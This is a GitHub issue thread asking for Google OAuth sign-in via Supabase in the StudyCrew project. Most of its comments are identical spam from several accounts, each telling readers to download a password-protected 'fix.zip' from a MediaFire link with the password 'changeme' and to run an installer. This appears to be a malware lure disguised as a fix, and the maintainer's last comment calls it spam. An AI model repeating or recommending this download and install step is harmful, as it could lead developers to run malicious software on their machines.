### ISSUE TITLE
Social Login (OAuth) Login with Google

### ISSUE THREAD

**Issue by franclobo** [StudyCrew/StudyCrew#534]
**Description**

Supabase Auth supports Sign in with Google for the web, native Android applications, and Chrome extensions.

**Prerequisites**

- A Google Cloud project. Go to the [Google Cloud Platform](https://console.cloud.google.com/home/dashboard) and create a new project if necessary.

**Configuration**

- All the process is described on the Supabase [documentation](https://supabase.com/docs/guides/auth/social-login/auth-google?queryGroups=platform&platform=web)

**Activities**

- Create the project in Google Cloud Platform.
- Set up the signin button.

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by franclobo** [comment]
The issue was infected with spam
